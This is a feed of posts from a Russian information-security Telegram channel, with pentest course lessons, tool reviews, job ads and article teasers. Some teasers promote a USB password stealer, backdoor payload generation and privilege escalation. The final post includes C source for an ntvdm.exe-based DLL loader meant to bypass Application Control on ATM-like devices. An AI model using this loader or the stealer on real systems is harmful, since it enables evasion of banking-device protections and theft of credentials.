Codeby
36K subscribers
1.41K photos
92 videos
12 files
7.37K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz
Download Telegram
​​🔥 Вышел 15 урок бесплатного курса по пентесту: 🔥

Урок 15 — SQL-инъекции

Дамп
колонок таблицы через SQL. Теоретическая база.

🔗 https://t.me/joinchat/J58Jjsf8OLA4YjVi

#Pentest
​​Striker - Сканер для получения различной информации

За счёт встроенного модуля обхода защиты Cloudflare , Striker достаёт очень полезную информацию. Несмотря на определение ,что это инструмент нахождения уязвимостей , всё же больше он разведывательный. И его функционал выявления уязвимостей сильно ограничен конечно. Проведя несколько тестов , я не видел ,чтобы он что-то находил из этой задачи.

Читать: https://codeby.net/threads/striker-skaner-dlja-poluchenija-razlichnoj-informacii.63110/

#scaner #gathering
Приглашаем специалистов для создания курсов по тематике Информационная Безопасность
Предложения принимаются до 08.05.2021

300.000 - 1.500.000 руб / курс

Приглашаем к сотрудничеству как отдельных специалистов, так и команды.

✔️ Будьте готовы подтвердить свою экспертность: для руководителя курса - опыт работы в сфере ИТ/ИБ от 5 лет, для помощников - от 2х лет.
✔️ Если решите возглавить создание курса, но у вас нет команды, поможем найти помощников.
✔️ Если команда не нужна, тоже не проблема.

За каждый курс создатель или команда получают от 300.000 до 1.500.000 руб, в зависимости от объема и сложности работ. Возможна частичная оплата, по факту готовности глав курса. После создания курса, при желании, можно оказывать услуги инструктора своего курса.

Каждый курс должен состоять из теории и практики. Теория в тексте + видео (с разъяснением сложных моментов текстовой методички) в записи. Озвучку роликов берем на себя, если с голосом "не очень" :). Практические задания должны быть к каждому уроку с проверкой инструктора и допуску к дальнейшему материалу, если задания выполнены верно.

В выборе тематики курса не ограничиваем. Уже созданные курсы можно посмотреть по ссылке: https://school.codeby.net/lms.html

При отклике присылайте резюме

🔗 Откликнуться: https://freelance.codeby.net/orders/priglashajem-specialistov-dla-sozdanija-kursov-po-tematike-informacionnaja-bezopasnost-214.html или на почту school@codeby.net
​​usbrip: USB-форензика для Линуксов, или Как Алиса стала Евой

Около 2-х недель назад ко мне обратился знакомый (далее "Боб") с просьбой о помощи в доказательстве факта измены своей подруги (далее "Алиса"), апеллируя к тому, что "ты ж программист". Согласен, довольно необычный аргумент в такой ситуации, но технари же всесильны, разве нет)? Конечно, я согласился, ибо предстояло интересное расследование компьютерной активности в поисках аномальных следов любовника на ноутбуке подруги друга (заковыристо!), что обещало хоть как-то разбавить мои серые буди. В этой статье поговорим об опенсорсной утилите usbrip, написанной энтузиастом-соотечественником (насколько я могу судить по профилю на Гитхабе) для мониторинга истории USB-подключений под Линуксами, моем опыте ее использования и применения к "боевым" задачам.

Читать: https://codeby.net/threads/usbrip-usb-forenzika-dlja-linuksov-ili-kak-alisa-stala-evoj.63644/

#usb #linux #forensics
​​Создаем USB stealer паролей (для начинающих)

В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции. Что же нам для этого надо: 1) usb флюшка, 2) продукты от Nirsoft'a

Читать: https://codeby.net/threads/sozdaem-usb-stealer-parolej-dlja-nachinajuschix.63571/

#usb #stealer #password
Media is too big
VIEW IN TELEGRAM
⚡️ Тест на уязвимость WordPress ⚡️

Как можно проверить CMS WordPress на уязвимости c помощью Wpscan и BurpSuite. Лучшей программой для сканирования WordPress является WPScan. Этот инструмент способен определять версию WordPress, а также то, какие плагины и темы, каких версий используются. WPScan обладает обширной и актуальной базой уязвимостей в этих плагинах и темах, поэтому сопоставляя данные, полученные при сканировании с этой базой, программа сообщает нам об уязвимостях, которые присутствуют на исследуемом сайте.

🔗 Источник https://codeby.net/media/test-na-ujazvimost-wordpress.223/
​​[Шпаргалка] Разведка и аудит сервера

Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика. Возможно, пригодятся тем, кто начинает осваивать CTF. А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной системы.

Читать: https://codeby.net/threads/shpargalka-razvedka-i-audit-servera.63524/

#ctf #kali #linux
​​Terminator - генератор Payloads для Metasploit

Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите за дерзость,но продемонстрирую вам атаку на BlackArch Linux.

Читать: https://codeby.net/threads/terminator-generator-payloads-dlja-metasploit.63477/

#payload #metasploit #framework
​​Samurai Email Discovery - Утилита для поиска e-mail адресов

Всем привет! Сегодня хочу ознакомить Вас с небольшим фреймворком, написанным на Bash, целью которого является поиск почтовых ящиков. Samurai Email Discovery – много писать о нем смысла не имеет, я лучше покажу. Samurai Email Discovery – производит поиск адресов по трем векторам: Google Dork, domain, company.

Читать: https://codeby.net/threads/samurai-email-discovery-utilita-dlja-poiska-e-mail-adresov.63474/

#kali #linux #email
​​Как повысить привилегии в Windows

Добрый день, Коллеги. Сразу оговорюсь, я не претендую на полноценное авторство для данной статьи. Моя работа скорее была - скомпоновать техники и проверить их на практике, оставив только реально рабочие и полезные варианты. В данной статье используются переводы с зарубежных форумов и статей, часть наших, часть писал и в том числе я сам. Просто делюсь своими архивчиками. Сегодня мы поговорим о повышение привилегий Windows.

Читать: https://codeby.net/threads/kak-povysit-privilegii-v-windows.63428/

#windows #pentest #manual
Шпаргалка для продвинутых фрилансеров

У каждого опытного фрилансера, будь то дизайнер, копирайтер или маркетолог, всегда возникает вопрос: как выйти на новый уровень, успешно на нём реализоваться и пойти дальше? Это хороший вопрос, потому что любой фрилансер хочет зарабатывать много, работая мало, а также иметь стабильный поток заказов от постоянных клиентов. Для достижения этой цели нужно развивать свой личный бренд, […] https://freelance.codeby.net/blog/?p=521
Группа @dc78182 (Архангельск) собирает команду из 29-го региона для совместной подготовки и участию в StandOff, который состоится в мае.

🔥 Состав команды формируется до 16 апреля 🔥

Чтобы стать участником команды, нужно перейти в группу и отметиться в закреплённом опроснике.

Для тех, кто войдёт в состав команды, хорошая компания и пицца обеспечены)

#Реклама
#реклама

Какие навыки необходимы ИБ-специалистам, и где их получить?

На интенсиве «Кибербезопасность: Level 0» от HackerU вы приобретете базовые знания о сетевых атаках и опыт их предупреждения. Как проходит обучение?

— 3 дня и 12 ак.часов с действующими ИБ-специалистами, среди которых руководители и специалисты SOC
— Закрытые видеоконференции и возможность получить записи занятий
— Неограниченное общение и обратная связь от экспертов
— Только практика и разбор реальных кейсов

После интенсива вы сможете создавать тестовые стенды для анализа безопасности, перехватывать и анализировать сетевой трафик, разворачивать систему обнаружения и многое другое. Кроме того, вы получите сертификат и бонусы при поступлении на любые практические курсы!

Записывайтесь на интенсив и сделайте первый шаг к карьере в кибербезопасности!

Записывайтесь по ссылке: https://is.gd/mA2NvP
​​Разбираемся с osmocom-bb

Приветствую, форумчане! В этой статье я хочу рассказать о том, как начать работать с osmocom-bb - проекте, позволяющем сделать из старой моторолы инструмент изучения и тестирования GSM сетей. Я постараюсь дать достаточное количество информации, что бы вы без лишней боли смогли начать работу с osmocom.

Читать: https://codeby.net/threads/razbiraemsja-s-osmocom-bb.63421/

#gsm #hacking #motorola
​​🔥 Вышел 16 урок бесплатного курса по пентесту: 🔥

Урок 16 — SQL-инъекции

Изучаем
команды для слепой SQL-инъекции.

🔗 https://t.me/joinchat/J58Jjsf8OLA4YjVi

#Pentest
​​История хакера - Ричард Столлман

Доброго времени суток, уважаемые форумчане! Как было обговорено в первой “истории хакера”, говорить мы будем не только о хакерах, но и о других интересных личностях. Сегодня речь пойдёт об основателе проекта GNU, и фонда свободного программного обеспечения(FSF) .Ричард Мэттью Столлман - Родился в Нью-Йорке в марте 1953 года. Создал множество ПО, и основал несколько всемирно известных проектов (GNU,FSF). Хотя нельзя сказать что он не был хакером, так как в 70-е года хакерами были не “Злые ИБшники”, а хорошо разбирающиеся в программировании люди.

Читать: https://codeby.net/threads/istorija-xakera-richard-stollman.77214/

#hacking #history #gnu
Forwarded from Фриланс Кодебай
Ищем исполнителей для доработок IBM Notes

Предложения принимаются до 26.04.2021

Ищем исполнителей для сотрудничества.
Периодичность заказов - раз в 2-3 месяца.
Объект доработок - IBM Notes 9. Обновляться пока не планировали.
Порядок работ стандартный, оплаты без задержек.

Прошу указать:
1. Стоимость часа работы
2. Часовой пояс
3. Ссылку на профиль, где можно оценить релевантный опыт
4. Предпочтительный порядок оформления договорных отношений

Откликнуться https://freelance.codeby.net/orders/ishhem-ispolnitelej-dla-dorabotok-ibm-notes-244.html

#Фриланс
​​Новостной дайджест по ИБ/IT за 5.04-12.04

Здравия всем, дамы и господа. Сегодня я вновь здесь, пишу для вас, приятного времяпрепровождения. 10Гбит/с​, В заголовке указана мощность Ддос атаки, господа знающие не дадут соврать, что такая атака — детский лепет.. Произошла утечка запросов на кредит в банк Дом-рф в количестве 100 тысяч штук. "Пока живите​" - Сказал Роскомнадзор, решив пока не блокировать Twitter, а продолжить замедление". Для меня, такое давление на FSF и всё что с ним связано вызывает некоторые опасения. Debian не мог определиться с выбором в такой ситуации и запустил голосование среди разработчиков...

Читать: https://codeby.net/threads/novostnoj-dajdzhest-po-ib-it-za-5-04-12-04.77217/

#it #news #digest
Forwarded from Фриланс Кодебай
Система тестирования знаний

Предложения принимаются до 18.04.2021

Необходимо написать небольшую систему тестирования студентов
✔️ Веб интерфейс
✔️ Авторизация по логину и паролю
✔️ Отдельная учетная запись для преподавателя

Возможности уч. записи студента: выбор теста, прохождение теста.
Возможности уч. записи преподавателя: создание/редактирование/удаление теста.

Система должна распознавать и оценивать ответ студента в свободно-конструированной форме (в свободной форме). Т.е. преподаватель задает эталонный (правильный вариант) ответ, студент отвечает на вопрос в свободной форме, система сравнивает ответы и выставляет бал относительно совпадений ключевых слов, как то так.

🔗 Откликнуться https://freelance.codeby.net/orders/sistema-testirovanija-znanij-243.html
​​Namechk - ищем человека по нику

Hello всем, решил поделиться с вами инструментом под названием namechk, который по нику ищет профиль на 100 сайтах, форумах и соц.сетях. А теперь кратко по функциям: Искать доступные имена, искать доступные имена на вашем сайте(указанном), искать по списку, искать имена, которые используются, искать имена, которые используются, по листу:

Читать: https://codeby.net/threads/namechk-ischem-cheloveka-po-niku.63615/

#nickname #find #checker
​​🔥 Обход Application Control 🔥

Вы когда-нибудь задумывались о том, как устроена защита банкоматов?

Сегодня рассказываем о защите банкомато-подобных устройств и её обходе. Как, возможно, Вы знаете, на такие устройства ставят различного рода системы, от дремучих до последних версий десятки. В системе работает ряд приложений банковской направленности, и защита, разумеется. Имя этой защите — Application Control.

Проверка приложений осуществляется по признакам:
✔️ путь к исполняемому файлу;
✔️ контрольная сумма;
✔️ криптографическая подпись;
✔️ белый/черный список;
✔️ позволение использования только файлов с определёнными расширениями.

Эти способы используются, дополняя друг друга. Теперь о методах их обходов:
✔️ выполнение из-под доверенных приложений;
✔️ одинаковые контрольные суммы;
✔️ подмена DLL.

Хотелось бы уточнить, почему в начале мы использовали выражение «банкомато-подобные», — это возможность использования Application Control не только на банкоматах, что логично. Теперь к той части поста, который расскажет об обходе системы. Задействуем способ с выполнением из-под приложения, являющегося доверенным, в нашем случае это ntvdm.exe. В современных x86-системах Windows в контексте ntvdm можно исполнить 16-ти разрядное приложение. Нужно поднять виртуалку на Windows 95 и установить туда Microsoft Visual C 1.52c — последнюю версию, которая поддерживала сборку 16bit приложений:

 <Windows.h>
DECLARE_HANDLE32(HPROC32);
DECLARE_HANDLE32(HINSTANCE32);

int main(int argc, char** argv)
{
HMODULE hModule;
HINSTANCE32 hDll;
HINSTANCE32 (WINAPI *LoadLibraryEx32W) (LPCSTR, DWORD, DWORD);
BOOL (WINAPI *FreeLibrary32W) (HINSTANCE32);
printf("begin" "\n");
if(argc != 2)
{
printf("Usage: loader.exe my.dll" "\n");
return 1;
}
hModule = GetModuleHandle("KERNEL");
if(!hModule)
{
printf("GetModuleHandle - %08X" "\n", hModule);
return 1;
}
(FARPROC) LoadLibraryEx32W = GetProcAddress(hModule, "LoadLibraryEx32W");
(FARPROC) FreeLibrary32W = GetProcAddress(hModule, "FreeLibrary32W");
if(!LoadLibraryEx32W || !FreeLibrary32W)
{
printf("GetProcAddress - %08X, %08X" "\n", LoadLibraryEx32W,FreeLibrary32W);
return 1;
}
hDll = LoadLibraryEx32W(argv[1], 0, 0);
if(!hDll)
{
printf("LoadLibraryEx32W - %08X" "\n", hDll);
return 1;
}
getchar();
FreeLibrary32W(hDll);
printf("end" "\n");
return 0;
}

Далее необходимо собрать это в исполняемый файл. Выбираем формат QuickWin, так как он не требует создания проекта. Получившийся файл скидывается на целевую систему и запускается, в качестве аргумента дается имя 32bit динамической библиотеки, которая должна находиться в той же папке. Это может быть любая библиотека — от выводящей Hello World до чего угодно. Чтобы противостоять угрозам, требуется «смотреть им в лицо», так что рассматривайте приведенный код с точки зрения противостояния ему.

До новых встреч!